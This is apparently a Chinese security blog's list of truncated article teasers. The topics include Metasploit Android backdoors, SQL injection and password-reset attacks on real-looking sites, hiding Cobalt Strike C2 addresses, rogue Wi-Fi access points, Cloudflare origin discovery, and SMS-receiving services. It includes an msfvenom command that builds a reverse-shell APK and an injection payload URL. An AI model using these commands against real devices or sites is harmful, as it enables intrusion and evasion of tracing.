小白向–msf入侵安卓手机
环境:攻击方:nethuner(OnePlus 6t) 192.168.1.83目标机:vivo y551、生成后门程序msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.83 LPORT=5555 R>1.apk #生成后门程序(1...
实战:国外某站sql注入渗透测试
1.访问网站:http://www.xxxx.ac.in/news.php?id=22.判断是否存在sql注入payload:http://www.xxxx.ac.in/news.php?id=2%273.这么一看,明显就是报错注入了,既然是报错注入那么一般就是updatexm...
实战:某edu后台任意用户密码重置
1.访问网页:http://xxx.xxx.edu.cn:9091/findpwd2.在输入用户名的输入框中进行测试寻找有的用户名 3.发现test用户名存在进行尝试获取验证码,使用burp抓包进行获取验证码 4.填写成自己的手机...
实战SRC | 某站点后台管理系统SQL注入
0x01 前景在进行fofa盲打站点的时候,来到了一个后台管理处看到集市二字,应该是edu站点 确认目标身份【归属】(使用的quake进行然后去ipc备案查询) 网站后台很像cms搭建的,在查看网站时...
隐藏防朔源-隐藏CS真实上线IP地址
原理图环境云服务器(teamserver)centos (apache中转)实战中中转机使用肉鸡或者国外服务器即可,这里没那么多公网服务器使用虚拟机代替win10(受害者)win7(cs客户端)1、代理机安装Apachec...
如何使用MANA工具包创建Wi-Fi流氓访问点并拦截HTTP流量
前言MANA 允许您执行各种 Wi-Fi 攻击,即使使用 Android 设备也是如此。MANA(MITM 和网络攻击)无线工具包是一套工具,可用于执行中间人 (MITM) 攻击、创建恶意接入点、拒绝服务 (DoS) 攻...
WSL2 kali如何访问宿主机USB设备
前言自从windows推出的WSL功能,对广大的Linux和嵌入式开发者来说是巨大福利,基本可以媲美日常vmware虚拟机的替换。但WSL还是存在一些不足,其中两点比较重要:WSL环境如何访问宿主机的USB设备...
查找Cloudflare背后真实IP工具
声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。工具介绍CloakQuest3r是一款功能强大...
快速提取APK中IP和URL
前言在渗透测试中,攻击者可以通过对app进行逆向分析。获取app访问的url或者IP。从而对IP进行攻击,本文为大家介绍的这款工具,可以方便的为你分析app中存在的url。注意:本文仅供学习和研究,...
数字取证平台开源!侦探工具包,有渠道就可以搞钱!
声明:本技术非常强大,本号只分享技术,切勿用在其他方面。如若有渠道,可以出售,请遵守开源协议。并遵守国家法律法规!一个数字取证平台以及 The Sleuth Kit® 和其他数字取证工具的图形界面...
2024最新接码平台汇总大纲——严禁外传
只列了一些出来,需要更多可以在搜索引擎网站搜关键词“Receive SMS”https://tiger-sms.com/free 免费法国号码FREE NUMBERS:https://tx.me/smsnam telegram上的国外免费短信验证码接码频道,...